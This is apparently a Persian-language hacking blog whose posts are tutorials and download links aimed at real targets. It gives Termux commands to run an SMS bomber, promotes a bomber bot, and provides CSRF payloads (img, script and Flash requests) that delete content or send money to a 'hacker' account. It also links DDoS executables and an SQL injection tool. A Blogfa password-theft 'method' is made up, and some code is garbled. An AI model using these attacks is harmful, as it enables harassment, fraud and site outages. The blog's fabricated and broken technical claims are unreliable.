تیم ایران امنیت
مار سیاه و داوهک
هدف ما افزایش اطلاعات شماست و هر گونه استفاده ناددرست بر عهده خودتونه
-
۰۰/۰۹/۲۵دانلود سورس لاگین php
-
۰۰/۰۹/۲۵آموزش اس ام اس بمبر
-
۰۰/۰۸/۲۴هک سایت با باگ csrf
-
۰۰/۰۸/۲۴Iransecurity
-
۰۰/۰۸/۲۴هک وبلاگ بلاگفا
-
۰۰/۰۸/۱۹بازدید و لایک فیک در آپارات
-
۰۰/۰۸/۱۹هک سایت
-
۰۰/۰۸/۱۷آدرس آپارات ما
-
۰۰/۰۸/۱۷آموزش دیداس پیج ها
black snake 🐍download
سلام دوباره الانم با آموزش اس ام اس بمبر با ترموکس داریم
pkg install python -y
pip install requests
git clone https://github.com/joker192/GOD_SMS_BOMBER.git
cd GOD_SMS_BOMBER
python3 GodBomber.py
شماره رو با +98 باید بزنین
با تشکر DAWHACK
سلام دوستان ببخشید چند هفته ای نبودیم حالا اومدیم با قدرت
امروز میخوام بهتون آموزش اس ام اس بمبر در گوشی و در تلگرام رو بهتون آموزش بدم
خب ما اول به تلگرام نیاز داریم و این بات توسط ما ساخته شده است .
اینم آدرس بات : @boommber_bot
اول استارت کنید و بخش رایگان رو امتحان کنین و با زیر مجموعه آوردن در این بات میتونید سکه جمع آوری کنید .
و با سکه می تونید از ببخش پولی استفاده کنین و حالش رو ببرید
با تشکر dawhack
سلام مار سیاهم با یه اموزش خیلی خفن دیگه همراهتونم
منبع: @hackgm
در این آموزش قصد آموزش ھک سایت با باگ CSRF و ھمچنین راه ھای جلوگیری از ھک شدن با باگ CSRF را
بررسی کنیم. حملات CSRF مخفف عبارت Cross Site Request Forgery ، که در واقع به معنی کلی
ارسال در خواست ھای جعلی می باشد.
با آسیب پذیری CSRF ، می توان از طریق مهندسی اجتماعی یا ویروس ھا بر روی کامپیوتر شخص ، این فرایند
را انجام داد.
مثال اول در آموزش ھک سایت با باگ CSRF
فرض کنید شما دارای یک سیستم خبری ھستید ، در پنل شما صفحه برای حذف اخبارتان وجود دارد.
قسمتی از کد صفحه حذف خبرھا:
php check_auth(); if(isset($_GET['news'])) { unlink('files/news'?
<? { ;('.$news.'.txt'); } else { die('File not deleted
اسم این فایل برای مثال remove.php است. بدین شکل شما به عنوان ادمین می توانید ، یک خبر را با دستور
Get حذف کنین,
https://site/remove.php?news=1
اگر شما به پنل کاربریتان وارد شوید با باز کردن این لینک مطلب شما حذف خواھد شد. اما سوال اینجا پیش می
آید یک ھکر چگونه می تواند سایت شما را به خطر بی اندازد. ھمینطور که گفته شد ، یک ھکر می تواند از طریق
غیر مستقیم با باگ CSRF چرا که به اطلاعات شما دسترسی ندارد ، این کار را انجام بدھد . ابتدا یک صفحه
ساخته کد زیر را درون آن جای می گذارد.
<"img src=site/remove.php?news=1" width="2" height="2>
حالا لینک صفحه ای که برای شما ساخته را خواھد داد و شما بدون این که اطلاعی داشته باشید ، ارسال درخواست
کردید به سایت خبری خودتون برای حذف این خبر.
با باگ CSRF می توان پسورد ادمین نیز تغییر داد.
مثال دوم آموزش ھک سایت با باگCSRF شما یک سیستم پرداخت و تسویه حساب در سایت خود دارید ، که با
لینک زیر یک در خواست تسویه حساب ثبت می شود.
https://site/tra?acct=amin&tot=100000
در این لینک مبلغ ۱۰۰۰۰ تومان به کاربری امین وارد می شود ، یک ھکر با سو استفاده از نشست ھای شما اقدام
به ساخت صفحه ھاتی برای ارسال درخواست ھای جعلی برای ارسال تسویه حساب به خوش می کند,
img src="https://site/tra?acct=hacker&tot=100000" width="2">
<"height="2
ھمچنین روش ھای دیگر برای ارسال درخواست CSRF می توان از فریم ھا و فراخانی از اسکریپت ھا معرفی
کرد.
کد فریم در HTML برای حملات CSRF:
img src="https://site/tra?acct=hacker&tot=100000" width="2">
<"height="2
کد فراخانی اسکریپت در HTML برای حملات CSRF:
<"script src="https://site/tra?acct=hacker&tot=100000>
در سطح بالا تر این حملات حتی می توان این حملات رو به صورت فلش نیز گسترش داد,
;Import flash.net.URLRequest
;Import flash .system.Security
var url = new URLRequest(“https://site/tra?
;(”acct=hacker&tot=100000
;()var sec = new URLVariables
;”url.method = “POST
;url.data = sec
;(sendToURL(url
;()stop
مار سیاهم 🐍
سلام
مار سیاهم با اموزش هک وبلاگ های بلاگفا
ما هیچ مسئولیتی رو قبول نمیکنیم
برای این کار اول باید یک متن رو به مدیر وبلاگ ایمیل کنید
و مدیر وبلاگ باید از کامپیوتر استفاده کنه و داخل مرورگرش پسورد ذخیره شده باشه.
این متن رو ارسال میکنید
<xml>
go to and play (c:/system volume information/ie_blogfa.com/login.title/password.title)
send to email (Your Email Address)
</xml>
به جای your email address ایمیلتونو وارد کنید
این متن رو براش ارسال کنید
به محض باز کردنش پسورد برای شما ارسال میشه
امیدوارم این مطلب براتون مفید بوده باشه
Black Snake🐍
سلام به دوستان عزیز این نرم افزار بهتون لایک و دنبال کننده ی فیک در آپارات میده خیلیا اینو پولی میزارن و ما خواستیم که بههتون رایگان بدیمش
من این لینک رو میزارم و البته برای استارت زدن شما به یه لیست پروکسی خوب احتیاج دارید
که با یه سرچ تو گوگل پیدا میشه
لینک دانلود:https://s20.picofile.com/file/8443564776/Aparat_Tools_v2_0_by_RP_SOFT.exe.html
.
.
.
کانال آپارات بنده لطفا دنبال بشه:https://www.aparat.com/amir10268 و با تشکر dawhack
سلام دوستان خیلی خوش اومدین به سایت ما در این اموزش یه برنامه ایبه اسم هیج رو براتون میزارم
لینک دانلود:https://s21.picofile.com/file/8443564076/Havij.exe.html
حمایت و دنبال در کانال آپارات فراموش نشه با تشکر dawhack
سلام دوستان میتونید این آموزش دیداس پیج رو از این لینک در آپارت نگاه کنیدhttps://www.aparat.com/v/eCvSo/%D9%87%DA%A9_%D8%B3%D8%A7%DB%8C%D8%AA
و آدرس آپارات من:https://www.aparat.com/amir10268هست لطفا لایک و دنبال کنید. با تشکر Daw hack
سلام دوستان امروز با یک آموزش خفن در کنارتون هستیم
Ddos
Ddos یعنی اینکه شما آن قدر چیز یا کاربر به سایت می فرستید که در نهایت سایت خاموش میشه یا هاستش میسوزه.
من برایتان یک نرم افزاری به اسم anonymous eterna lattack.exe و anony mous Doser .exe رو براتون میذارم
https://uploadb.me/direct/j055rtfymv8g/Anonymous External Attack.exe.html
https://uploadb.me/direct/qvnxvu0s8i3y/AnonymousDoSer.exe.html
سلام دوستان خوش امدین هر گوه استفاده ی نادرست از این سایت بر عهده ی خود کاربر می باشد.